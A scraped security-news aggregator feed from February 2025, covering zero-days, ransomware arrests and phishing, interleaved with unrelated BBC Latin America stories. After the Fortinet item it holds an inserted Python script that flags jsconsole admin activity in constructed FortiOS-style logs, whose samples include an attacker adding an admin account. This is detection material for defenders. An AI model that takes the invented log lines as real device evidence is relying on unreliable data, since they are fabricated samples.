    Autosummary: In 2022, a Russian hacker acquired IP addresses from Zservers, which were likely used with LockBit chat servers to coordinate ransomware activities, while, in 2023, Zservers provided infrastructure, including a Russian IP address, to a LockBit affiliate. "


    Apple fixes zero-day vulnerability used in “extremely sophisticated attack”

    exploits
    2025-02-11 https://www.malwarebytes.com/blog/news/2025/02/apple-fixes-zero-day-vulnerability-used-in-extremely-sophisticated-attack
    Apple has released an out-of-band security update for a vulnerability which it says may have been exploited in an "extremely sophisticated attack against specific targeted individuals.” "

    Autosummary: The update is available for: iOS 18.3.1 and iPadOS 18.3.1 (iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later); iPadOS 17.7.5 (iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation). If you use any of these then you should install updates as soon as you can. "


    Phishing evolves beyond email to become latest Android app threat

    financial
    2025-02-11 https://www.malwarebytes.com/blog/news/2025/02/phishing-evolves-beyond-email-to-become-latest-android-app-threat
    Android phishing apps are the latest, critical threat for Android users, putting their passwords in danger of new, sneaky tricks of theft. "

    Autosummary: Over time, phishing emails have advanced—cybercriminals have stolen credit card details by posing as charities—but so, too, have phishing protections from major email providers, sending many cybercriminal efforts into people’s “spam” inboxes, where the emails are, thankfully, never retrieved. Once the passwords are sold, the new, malicious owners will attempt to use individual passwords for a variety of common online accounts—testing whether, say, an email account password is the same one used for a victim’s online banking system, their mortgage payment platform, or their Social Security portal. Use multifactor authentication on your most sensitive accounts, including your financial, email, social media, healthcare, and government platforms (such as any accounts you use to file taxes). "


    Microsoft February 2025 Patch Tuesday fixes 4 zero-days, 55 flaws

    exploits
    2025-02-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2025-patch-tuesday-fixes-4-zero-days-55-flaws/
    Today is Microsoft's February 2025 Patch Tuesday, which includes security updates for 55 flaws, including four zero-day vulnerabilities, with two actively exploited in attacks. [...] "

    Autosummary: The number of bugs in each vulnerability category is as follows: 19 Elevation of Privilege Vulnerabilities; 2 Security Feature Bypass Vulnerabilities; 22 Remote Code Execution Vulnerabilities; 1 Information Disclosure Vulnerability; 9 Denial of Service Vulnerabilities; 3 Spoofing Vulnerabilities. The above numbers do not include a critical Microsoft Dynamics 365 Sales elevation of privileges flaw and 10 Microsoft Edge vulnerabilities fixed on February 6. "


    Fortinet warns of new zero-day exploited to hijack firewalls

    exploits
    2025-02-11 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-zero-day-exploited-to-hijack-firewalls/
    Fortinet warned today that attackers are exploiting another now-patched zero-day bug in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks. [...] "

    Autosummary: Reconnaissance (November 22, 2024 to November 27, 2024); SSL VPN configuration (December 4, 2024 to December 7, 2024); Lateral Movement (December 16, 2024 to December 27, 2024). "Given subtle differences in tradecraft and infrastructure between intrusions, it is possible that multiple individuals or groups may have been involved in this campaign, but jsconsole usage was a common thread across the board," it added. "
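The autosummary above notes that jsconsole usage was the common thread across the intrusions. The Python below is an added example, not Fortinet's or BleepingComputer's code, of how a defender might sweep FortiOS-style event logs for administrative activity over that interface. It assumes the logs are in the key="value" syslog layout with a `ui=` field naming the management interface and a `srcip=` field for the client address; the sample lines are constructed for this example and are not real device output. Flagged events are grouped per device and source address so unexpected origins stand out, and an allow-list of known administrative sources suppresses expected use.

```python
import re
from collections import defaultdict
from typing import Dict, FrozenSet, List

# Constructed FortiOS-style event log lines (not real device output). The
# key="value" layout, the ui= and srcip= fields, and all names and addresses
# are assumptions made for this example.
SAMPLE_LOGS = """\
date=2024-12-04 time=09:12:01 devname="fw-edge-1" type="event" subtype="system" logdesc="Admin login successful" user="admin" ui="jsconsole" srcip=203.0.113.7 action="login" status="success"
date=2024-12-04 time=09:40:17 devname="fw-edge-1" type="event" subtype="system" logdesc="Admin login successful" user="netops" ui="https(192.0.2.10)" srcip=192.0.2.10 action="login" status="success"
date=2024-12-05 time=22:03:45 devname="fw-edge-2" type="event" subtype="system" logdesc="Admin login successful" user="admin" ui="jsconsole" srcip=198.51.100.23 action="login" status="success"
date=2024-12-05 time=22:05:10 devname="fw-edge-2" type="event" subtype="system" logdesc="Object attribute configured" user="admin" ui="jsconsole" srcip=198.51.100.23 action="Add" cfgpath="system.admin" cfgobj="svc_backup"
"""

# key=value pairs; the value is either "quoted text" or a bare token
_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value log line into a dict (quoted or bare values)."""
    # findall yields '' for the alternative that did not match, so pick
    # whichever of the two value groups is populated.
    return {key: quoted or bare for key, quoted, bare in _KV_RE.findall(line)}


def find_jsconsole_activity(text: str,
                            allowed_srcips: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Return every event performed over the jsconsole UI from a non-allowed source."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev.get("ui") != "jsconsole":
            continue
        src = ev.get("srcip", "")
        if src in allowed_srcips:
            continue
        findings.append({
            "devname": ev.get("devname", ""),
            "user": ev.get("user", ""),
            "srcip": src,
            "logdesc": ev.get("logdesc", ""),
            "cfgobj": ev.get("cfgobj", ""),  # non-empty when a config object was touched
        })
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group flagged source addresses per device so the spread is visible at a glance."""
    by_dev = defaultdict(set)
    for f in findings:
        by_dev[f["devname"]].add(f["srcip"])
    return {dev: sorted(ips) for dev, ips in by_dev.items()}


if __name__ == "__main__":
    hits = find_jsconsole_activity(SAMPLE_LOGS)
    for h in hits:
        extra = f" -> {h['cfgobj']}" if h["cfgobj"] else ""
        print(f"{h['devname']} {h['user']} from {h['srcip']}: {h['logdesc']}{extra}")
    print(summarize(hits))
```

Run it over the exported event log of each firewall; a jsconsole login followed by a `system.admin` change from the same source is exactly the sequence worth pulling into an incident ticket, and any source address that is not a known jump host should be treated as hostile until shown otherwise.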


    Microsoft fixes two actively exploited zero-days (CVE-2025-21418, CVE-2025-21391)

    exploits
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/microsoft-fixes-exploited-zero-days-cve-2025-21418-cve-2025-21391-patch-tuesday/

    February 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 56 vulnerabilities, including two zero-days – CVE-2025-21418 and CVE-2025-21391 – under active exploitation. CVE-2025-21418 and CVE-2025-21391 CVE-2025-21418 is a vulnerability in the Windows Ancillary Function Driver (AFD.sys), which interfaces with the Windows Sockets API to enable Windows applications to connect to the internet. It can be exploited by attackers to elevate privileges on the target host. “An authenticated user would need to run … More

    The post Microsoft fixes two actively exploited zero-days (CVE-2025-21418, CVE-2025-21391) appeared first on Help Net Security.

    "

    Autosummary: Other vulnerabilities of note CVE-2025-21194, a security feature bypass vulnerability affecting Microsoft Surface laptops, and CVE-2025-21377, a NTLMv2 hash disclosure vulnerability that could be used by attackers to authenticate as the user, have been marked as “publicly disclosed”. "


    Attackers exploit a new zero-day to hijack Fortinet firewalls

    exploits
    2025-02-11 https://securityaffairs.com/174117/hacking/fortinet-fortios-zero-day-exploited.html
    Fortinet warned of attacks using a now-patched zero-day vulnerability in FortiOS and FortiProxy to hijack Fortinet firewalls. Fortinet warned that threat actors are exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in FortiOS and FortiProxy to hijack Fortinet firewalls. The vulnerability is an authentication bypass issue that could allow a remote attacker […] "

    Autosummary: Reconnaissance (November 22, 2024 to November 27, 2024); SSL VPN configuration (December 4, 2024 to December 7, 2024); Lateral Movement (December 16, 2024 to December 27, 2024). "


    BBC Verify: Why has Google Maps renamed the Gulf of Mexico?

    latam
    2025-02-11 https://www.bbc.com/news/videos/cy7gzk8d2r0o
    The Gulf of Mexico has been renamed the Gulf of America on Google Maps in the US. BBC Verify explains why Google made the change. "

    Autosummary: "


    XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells

    exploits
    2025-02-10 https://thehackernews.com/2025/02/xe-hacker-group-exploits-veracore-zero.html
    Threat actors have been observed exploiting multiple security flaws in various software products, including Progress Telerik UI for ASP.NET AJAX and Advantive VeraCore, to drop reverse shells and web shells, and maintain persistent remote access to compromised systems. The zero-day exploitation of security flaws in VeraCore has been attributed to a threat actor known as XE Group, a cybercrime "

    Autosummary: CVE-2025-0411 (CVSS score: 7.0) - 7-Zip Mark of the Web Bypass Vulnerability; CVE-2022-23748 (CVSS score: 7.8) - Dante Discovery Process Control Vulnerability; CVE-2024-21413 (CVSS score: 9.8) - Microsoft Outlook Improper Input Validation Vulnerability; CVE-2020-29574 (CVSS score: 9.8) - CyberoamOS (CROS) SQL Injection Vulnerability; CVE-2020-15069 (CVSS score: 9.8) - Sophos XG Firewall Buffer Overflow Vulnerability. Last week, Trend Micro revealed that Russian cybercrime outfits are exploiting CVE-2025-0411 to distribute the SmokeLoader malware as part of spear-phishing campaigns targeting Ukrainian entities. "


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [10 February]

    ciber
    2025-02-10 https://thehackernews.com/2025/02/thn-weekly-recap-top-cybersecurity_10.html
    In cybersecurity, the smallest crack can lead to the biggest breaches. A leaked encryption key, an unpatched software bug, or an abandoned cloud storage bucket—each one seems minor until it becomes the entry point for an attack. This week, we’ve seen cybercriminals turn overlooked weaknesses into major security threats, proving once again that no system is too small to be targeted. The question "

    Autosummary: This week’s list includes — CVE-2025-25064, CVE-2025-25065 (Zimbra Collaboration), CVE-2024-57968, CVE-2025-25181 (Advantive VeraCore), CVE-2025-20124, CVE-2025-20125 (Cisco Identity Services Engine), CVE-2025-23114 (Veeam Backup), CVE-2024-56161 (AMD), CVE-2025-21415 (Azure AI Face Service), CVE-2024-53104 (Linux Kernel/Android), CVE-2022-22706 (Arm), CVE-2025-23369 (GitHub Enterprise Server), PSV-2023-0039, PSV-2024-0117 (NETGEAR), CVE-2025-24118 (Apple), CVE-2025-24648, CVE-2024-43333 (Admin and Site Enhancements plugin), and CVE-2025-24734 (Better Find and Replace plugin). Organizations are also recommended to follow vendor hardening guides, subscribe to vendor notifications and advisories, keep devices always updated, enable centralized logging, enforce multi-factor authentication (MFA), disable unused functionality, maintain detailed device inventories, track configuration changes, detect hardware changes, review security policies, implement role-based access control, and include edge device compromise in their incident response plans. These networks, watchTowr said, originated from the government networks of the U.S., the U.K., Poland, Australia, South Korea, Turkey, Taiwan, and Chile; military networks, Fortune 500 companies, instant messaging platforms, and universities. Over a period of two months, the cybersecurity company said the buckets in question received more than 8 million HTTP requests for software updates, JavaScript files, virtual machine images, pre-compiled binaries for Windows, Linux, and macOS, and SSL-VPN configurations, among others. Five Eyes Nations Release Guidance for Edge Devices — Five Eyes cybersecurity agencies in Australia, Canada, New Zealand, the U.K., and the U.S., along with Czechia and Japan, have released joint guidance for network edge devices, urging device manufacturers to improve forensic visibility by integrating secure-by-default logging to help defenders detect attacks and investigate incidents. "


    DragonRank Exploits IIS Servers with BadIIS Malware for SEO Fraud and Gambling Redirects

    exploits
    2025-02-10 https://thehackernews.com/2025/02/dragonrank-exploits-iis-servers-with.html
    Threat actors have been observed targeting Internet Information Services (IIS) servers in Asia as part of a search engine optimization (SEO) manipulation campaign designed to install BadIIS malware. "It is likely that the campaign is financially motivated since redirecting users to illegal gambling websites shows that attackers deploy BadIIS for profit," Trend Micro researchers Ted Lee and "

    Autosummary: "It is likely that the campaign is financially motivated since redirecting users to illegal gambling websites shows that attackers deploy BadIIS for profit," Trend Micro researchers Ted Lee and Lenart Bermejo said in an analysis published last week. Targets of the campaign include IIS servers located in India, Thailand, Vietnam, Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil. "


    XE Group shifts from credit card skimming to exploiting zero-days

    exploits
    2025-02-10 https://securityaffairs.com/174045/cyber-crime/xe-group-exploiting-zero-days.html
    The cybercrime group XE Group exploited a VeraCore zero-day to deploy reverse shells, web shells in recent attacks. A recent investigation by researchers from Intezer and Solis Security shed light on the recent operations of the XE Group. Active since at least 2013, XE Group is a cybercriminal group focused on credit card skimming and […] "

    Autosummary: "


    Police arrests 4 Phobos ransomware suspects, seizes 8Base sites

    exploits ransomware
    2025-02-10 https://www.bleepingcomputer.com/news/legal/police-arrests-4-phobos-ransomware-suspects-seizes-8base-sites/
    A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide. [...] "

    Autosummary: The seizure message also indicates that "Operation Phobos Aetor" involved Thailand, Romania, Bavaria, Germany, Switzerland, Japan, USA, Europol, Czechia, Spain, France, Belgium, and the United Kingdom. "


    Cyberattack disrupts Lee newspapers' operations across the US

    ciber
    2025-02-10 https://www.bleepingcomputer.com/news/security/cyberattack-disrupts-lee-newspapers-operations-across-the-us/
    Lee Enterprises, one of the largest newspaper groups in the United States, says a cyberattack that hit its systems caused an outage last week and impacted its operations. [...] "

    Autosummary: Its portfolio includes the Buffalo News in New York, the Richmond Times-Dispatch in Virginia, the Arizona Daily Star, the Omaha World-Herald in Nebraska, the Press of Atlantic City, the St. Louis Post-Dispatch in Missouri, the Casper Star-Tribune in Wyoming, and dozens of other media outlets. "


    Microsoft raises rewards for Copilot AI bug bounty program

    exploits
    2025-02-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-raises-rewards-for-copilot-ai-bug-bounty-program/
    ​Microsoft announced over the weekend that it has expanded its Microsoft Copilot (AI) bug bounty program and increased payouts for moderate severity vulnerabilities. [...] "

    Autosummary: "


    Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores

    exploits
    2025-02-10 https://thehackernews.com/2025/02/hackers-exploit-google-tag-manager-to.html
    Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites. Website security company Sucuri said the code, while appearing to be a typical GTM and Google Analytics script used for website analytics and advertising purposes, contains an obfuscated backdoor capable of providing attackers with persistent "

    Autosummary: "


    Apple fixes zero-day exploited in "extremely sophisticated" attacks

    exploits
    2025-02-10 https://www.bleepingcomputer.com/news/apple/apple-fixes-zero-day-exploited-in-extremely-sophisticated-attacks/
    Apple has released emergency security updates to patch a zero-day vulnerability that the company says was exploited in targeted and "extremely sophisticated" attacks. [...] "

    Autosummary: "


    Toll booth bandits continue to scam via SMS messages

    financial ransomware
    2025-02-10 https://www.bitdefender.com/en-us/blog/hotforsecurity/toll-booth-bandits-continue-to-scam-via-sms-messages
    North American drivers are continuing to be barraged by waves of scam text messages, telling them that they owe money on unpaid tolls. Do you know what to tell your friends and family to watch out for? Read more in my article on the Hot for Security blog. "

    Autosummary: For instance, Texas-based audience producer Gwen Howerton described on Bluesky how she had been duped by an unpaid toll scam after she had driven a rental car on the Dallas North Tollway - and, not being aware of the correct way to pay a toll, had believed the overdue payment demand she received to be genuine. "


    Over 12,000 KerioControl firewalls exposed to exploited RCE flaw

    exploits
    2025-02-10 https://www.bleepingcomputer.com/news/security/over-12-000-keriocontrol-firewalls-exposed-to-exploited-rce-flaw/
    Over twelve thousand GFI KerioControl firewall instances are exposed to a critical remote code execution vulnerability tracked as CVE-2024-52875. [...] "

    Autosummary: "


    Apple fixes iPhone and iPad bug exploited in ‘extremely sophisticated attacks’

    exploits
    2025-02-10 https://securityaffairs.com/174066/hacking/apple-fixes-iphone-and-ipad-bug-exploited-in-extremely-sophisticated-attacks.html
    Apple released iOS and iPadOS updates to address a zero-day likely exploited in extremely sophisticated attacks targeting specific individuals. Apple released emergency security updates to address a zero-day vulnerability, tracked as CVE-2025-24200, that the company believes was exploited in “extremely sophisticated” targeted attacks. An attacker could have exploited the vulnerability to disable the USB Restricted […] "

    Autosummary: The zero-day impacts the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "


    Police arrests 2 Phobos ransomware suspects, seizes 8Base sites

    exploits ransomware
    2025-02-10 https://www.bleepingcomputer.com/news/legal/police-arrests-2-phobos-ransomware-suspects-seizes-8base-sites/
    A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of two suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide. [...] "

    Autosummary: The seizure message also indicates that "Operation Phobos Aetor" involved Thailand, Romania, Bavaria, Germany, Switzerland, Japan, USA, Europol, Czechia, Spain, France, Belgium, and the United Kingdom. The police operation, codenamed "Phobos Aetor," led to coordinated raids across four locations, where laptops, smartphones, and cryptocurrency wallets were seized for forensic analysis. "


    Week in review: Exploited 7-Zip 0-day flaw, crypto-stealing malware found on App Store, Google Play

    exploits
    2025-02-09 https://www.helpnetsecurity.com/2025/02/09/week-in-review-exploited-7-zip-0-day-flaw-crypto-stealing-malware-found-on-app-store-google-play/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. Crypto-stealing iOS, Android malware found on App Store, Google Play A number of iOS and Android apps on Apple’s … More

    The post Week in review: Exploited 7-Zip 0-day flaw, crypto-stealing malware found on App Store, Google Play appeared first on Help Net Security.

    "

    Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. New infosec products of the week: February 7, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Dynatrace, Nymi, Qualys, SafeBreach, and Satori. "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 32

    exploits
    2025-02-09 https://securityaffairs.com/174025/malware/security-affairs-malware-newsletter-round-32.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Malicious packages deepseeek and deepseekai published in Python Package Index; Coyote Banking Trojan: A Stealthy Attack via LNK Files; The Mac Malware of 2024; Take My Money: OCR Crypto Wallet Thieves on Google Play and App […] "

    Autosummary: "


    A Cybersecurity Leader’s Guide to SecVal in 2025

    ciber
    2025-02-09 https://www.bleepingcomputer.com/news/security/a-cybersecurity-leaders-guide-to-secval-in-2025/
    Are your defenses truly battle-tested? Security validation ensures you're not just hoping your security works—it proves it. Learn more from Pentera on how to validate against ransomware, credential threats, and unpatched vulnerabilities in the GOAT Guide. [...] "

    Autosummary: It’s possible to keep a proactive stance against ransomware by emulating strains—such as LockBit, REvil, Maze, or Conti — to assess how effectively defenses detect, contain, and neutralize these threats. Security validation ensures that credential-based defenses, like MFA, SSO, and account lockout mechanisms, function as intended. Author Bio Aviv Cohen, a seasoned Chief Marketing Officer, is a speaker, cartoonist, and author with over 20 years of experience in product and marketing management. "


    Thousands of baby turtles released in Brazil

    latam
    2025-02-09 https://www.bbc.com/news/videos/cnvq9l1j551o
    The project aims to boost numbers of threatened tracajás turtles in Amazonas state. "

    Autosummary: "


    Dozens killed in bus crash in southern Mexico

    latam
    2025-02-08 https://www.bbc.com/news/articles/c05ly8gp0llo
    The bus operator says 48 people had been travelling on the Cancun to Tabasco bus service. "

    Autosummary: "


    Mexico's Alvarez to fight Scull in Saudi unification bout

    latam
    2025-02-08 https://www.bbc.com/sport/boxing/articles/ce9n510n8l2o
    Saul "Canelo" Alvarez will meet IBF super-middleweight champion William Scull on 3 May, the first bout of a four-fight deal agreed with Saudi Arabia's Riyadh Season. "

    Autosummary: "


    Ghidra 11.3 released: New features, performance improvements, bug fixes

    exploits
    2025-02-07 https://www.helpnetsecurity.com/2025/02/07/ghidra-11-3-released-new-features-performance-improvements-bug-fixes/

    NSA’s Research Directorate released version 11.3 of Ghidra, an open-source software reverse engineering (SRE) framework. It offers advanced analysis tools, enabling users to dissect and examine compiled code across multiple platforms, including Windows, macOS, and Linux. Ghidra 11.3 is fully backward compatible with project data from previous versions. However, programs and data type archives created or modified in 11.3 will not be compatible with earlier versions of Ghidra. Visual Studio Code: Ghidra 11.3 replaces the … More

    The post Ghidra 11.3 released: New features, performance improvements, bug fixes appeared first on Help Net Security.

    "

    Autosummary: Visual Studio Code: Ghidra 11.3 replaces the VSCodeProjectScript.java GhidraScript (introduced in 11.2) with two new actions in the CodeBrowser tool: Tools → Create VSCode Module Project… – Sets up a Visual Studio Code project folder with a skeleton module for Ghidra extension development (Plugins, Analyzers, Loaders, etc.), including launchers for debugging and a Gradle task for exporting as a Ghidra extension. Additionally, the release marks a step forward in kernel-level debugging capabilities – Ghidra’s lldb connector now supports macOS kernel debugging, while the dbgeng connector can debug a Windows kernel running in a VM via eXDI, expanding Ghidra’s utility for low-level system analysis. "


    Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware

    exploits ransomware
    2025-02-07 https://thehackernews.com/2025/02/hackers-exploit-simplehelp-rmm-flaws.html
    Threat actors have been observed exploiting recently disclosed security flaws in SimpleHelp's Remote Monitoring and Management (RMM) software as a precursor for what appears to be a ransomware attack. The intrusion leveraged the now-patched vulnerabilities to gain initial access and maintain persistent remote access to an unspecified target network, cybersecurity company Field Effect said in a "

    Autosummary: "The attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware," security researchers Ryan Slaney and Daniel Albrecht said. "


    Panama says US "spreading lies" over free canal passage

    latam
    2025-02-07 https://www.bbc.com/news/articles/clyep7e070wo
    The US State Department had claimed that they were no longer required to pay a fee for transit. "

    Autosummary: On Wednesday, China's Foreign Affairs spokesman, Lin Jian, said its partnership with Panama was yielding "fruitful results" and urged the country to "resist external interferences." "


    Argentina canal turns bright red, alarming residents

    latam
    2025-02-07 https://www.bbc.com/news/articles/cpqlpvdvzlzo
    Pictures and videos show the intensely coloured water flowing into an estuary, the Rio de la Plata. "

    Autosummary: "


    Attackers used a public ASP.NET machine key to conduct ViewState code injection attacks

    government
    2025-02-07 https://securityaffairs.com/173956/hacking/abusing-asp-net-machine-to-deploy-malware.html
    Microsoft researchers warn that threat actors are delivering the Godzilla framework using a static ASP.NET machine key. In December 2024, Microsoft Threat Intelligence researchers spotted a threat actor using a public ASP.NET machine key to deploy Godzilla malware, exploiting insecure key usage in code. Microsoft has since found over 3,000 public keys that could be used […] "

    Autosummary: “If successful exploitation of publicly disclosed keys has occurred, rotating machine keys will not sufficiently address possible backdoors or persistence methods established by a threat actor or other post-exploitation activity, and additional investigation may be warranted.” concludes the report. "


    Microsoft has finally fixed Date & Time bug in Windows 11

    exploits
    2025-02-07 https://www.bleepingcomputer.com/news/microsoft/microsoft-has-finally-fixed-date-and-time-bug-in-windows-11/
    Windows 11's January 28 optional update has fixed a long-standing issue in Windows 11 24H2 that prevents non-admin users from changing their time zone in Date & Time Settings. [...] "

    Autosummary: "


    Data breaches at UK law firms are on the rise, research reveals

    financial
    2025-02-07 https://www.tripwire.com/state-of-security/research-reveals-data-breaches-rise-uk-law-firms
    British legal professionals have seen a "significant surge" in data breaches, according to new research from NetDocuments, a firm that provides a cloud-based content management platform for the legal sector. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: External data breaches, meanwhile, are initiated by people outside the organisation - malicious hackers, cybercriminals, or business rivals seeking a competitive advantage. "


    CISA Warns of Active Exploitation in Trimble Cityworks Vulnerability Leading to IIS RCE

    exploits government
    2025-02-07 https://thehackernews.com/2025/02/cisa-warns-of-active-exploitation-in.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned that a security flaw impacting Trimble Cityworks GIS-centric asset management software has come under active exploitation in the wild. The vulnerability in question is CVE-2025-0994 (CVSS v4 score: 8.6), a deserialization of untrusted data bug that could permit an attacker to conduct remote code execution. "This could "

    Autosummary: "


    India’s RBI Introduces Exclusive "bank.in" Domain to Combat Digital Banking Fraud

    financial
    2025-02-07 https://thehackernews.com/2025/02/indias-rbi-introduces-exclusive-bankin.html
    India's central bank, the Reserve Bank of India (RBI), said it's introducing an exclusive "bank.in" internet domain for banks in the country to combat digital financial fraud. "This initiative aims to reduce cyber security threats and malicious activities like phishing; and, streamline secure financial services, thereby enhancing trust in digital banking and payment services," the RBI said in a "

    Autosummary: "


    Cloudflare outage caused by botched blocking of phishing URL

    financial
    2025-02-07 https://www.bleepingcomputer.com/news/security/cloudflare-outage-caused-by-botched-blocking-of-phishing-url/
    An attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage that brought down multiple services for nearly an hour. [...] "

    Autosummary: There were also indirectly impacted services that experienced partial failures like Durable Objects, which had a 0.09% error rate increase due to reconnections after recovery, Cache Purge, which saw a 1.8% increase in errors (HTTP 5xx) and 10x latency spike, and Workers & Pages, that had a 0.002% deployment failures, affecting only projects with R2 bindings. "


    HPE notifies employees of data breach after Russian Office 365 hack

    financial rusia-ucrania
    2025-02-07 https://www.bleepingcomputer.com/news/security/hpe-notifies-employees-of-data-breach-after-russian-office-365-hack/
    Hewlett Packard Enterprise (HPE) is notifying employees whose data was stolen from the company's Office 365 email environment by Russian state-sponsored hackers in a May 2023 cyberattack. [...] "

    Autosummary: The group behind the attack, Cozy Bear (also known as Midnight Blizzard, APT29, and Nobelium), is believed to be part of Russia's Foreign Intelligence Service (SVR) and has also been linked to other high-profile breaches, including the infamous 2020 SolarWinds supply chain attack. "


    Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers

    exploits government
    2025-02-07 https://www.bleepingcomputer.com/news/security/hackers-exploit-cityworks-rce-bug-to-breach-microsoft-iis-servers/
    Software vendor Trimble is warning that hackers are exploiting a Cityworks deserialization vulnerability to remotely execute commands on IIS servers and deploy Cobalt Strike beacons for initial network access. [...] "

    Autosummary: The product helps municipalities and infrastructure agencies manage public assets, process work orders, handle permitting and licensing, capital planning, and budgeting, among other things. "


    U.S. CISA adds Trimble Cityworks flaw to its Known Exploited Vulnerabilities catalog

    exploits government
    2025-02-07 https://securityaffairs.com/173975/hacking/u-s-cisa-adds-trimble-cityworks-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Trimble Cityworks vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Trimble Cityworks vulnerability, tracked as CVE-2025-0994, to its Known Exploited Vulnerabilities (KEV) catalog. Trimble Cityworks is a GIS-centric asset management and permitting software designed for local governments, utilities, and […] "

    Autosummary: "


    Watch: Argentina canal turns bright red, alarming locals

    latam
    2025-02-07 https://www.bbc.com/news/videos/cevep790e3vo
    The body of water runs through industrial areas on the outskirts of Buenos Aires. "

    Autosummary: "


    Smashing Security podcast #403: Coinbase crypto heists, QR codes, and ransomware in the classroom

    exploits ransomware
    2025-02-06 https://grahamcluley.com/smashing-security-podcast-403/
    In episode 403 of "Smashing Security" we dive into the mystery of $65 million vanishing from Coinbase users faster than J-Lo slipped into Graham's DMs, Geoff gives a poor grade for PowerSchool's security, and Carole takes a curious look at QR codes. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by The Lazarus Heist's Geoff White. "

    Autosummary: Hosts: Graham Cluley: @grahamcluley.com Carole Theriault: @caroletheriault Guest: Geoff White Episode links: Sponsored by: Tailscale – Tailscale is perfect for work or personal projects, making networking simple. "


    Panama denies US claims over free canal passages

    latam
    2025-02-06 https://www.bbc.com/news/articles/cj9149j4nmzo
    Washington had suggested Panama had agreed to no longer charge fees for US government vessels using the waterway. "

    Autosummary: "


    Ransomware payments plummet as more victims refuse to pay

    exploits
    2025-02-06 https://www.helpnetsecurity.com/2025/02/06/global-ransomware-payments-2024-decrease/

    Chainalysis’ latest report on how the ransomware landscape changed from 2023 to 2024 shows a promising trend: an increasing number of victims refuse to pay the ransom. The total volume of ransom payments decreased year-over-year by approximately 35%, the blockchain analysis firm says. In 2023, victims delivered $1.25 billion to ransomware attackers and data theft and extortion gangs. In 2024, the number fell to $813.55 million. Ransomware payments vs. data leak site victims, 2024 (Source: … More

    The post Ransomware payments plummet as more victims refuse to pay appeared first on Help Net Security.

    "

    Autosummary: On the positive side, law enforcement around the world launched a number of actions that crippled some ransomware gangs: the takedown of LockBit’s infrastructure, the unmasking of the LockBit leader and affiliates, the charging of a LockBit developer, the sentencing of NetWalker affiliates, the charging of the Phobos ransomware administrator, the arrest of the suspected head of Reveton, Ransom Cartel RaaS groups, the disruption of the Radar/Dispossessor ransomware group and, before all that, the disruption of ALPHV/Blackcat leak sites (which was followed by the group’s exit scam in early 2024). "


    ActiveState accelerates secure software delivery

    government
    2025-02-06 https://www.helpnetsecurity.com/2025/02/06/activestate-vulnerability-management/

    ActiveState launched its Vulnerability Management as a Service (VMaas) offering that revolutionizes how organizations manage open source and accelerates secure software delivery. ActiveState’s Vulnerability Management as a Service combines Application Security Posture Management (ASPM) and Intelligent Remediation capabilities with expert guidance. This solution enables DevSecOps teams to not only identify vulnerabilities in open source packages, but also to automatically prioritize, remediate, and deploy fixes into production without breaking changes, ensuring that applications are truly secured. … More

    The post ActiveState accelerates secure software delivery appeared first on Help Net Security.

    "

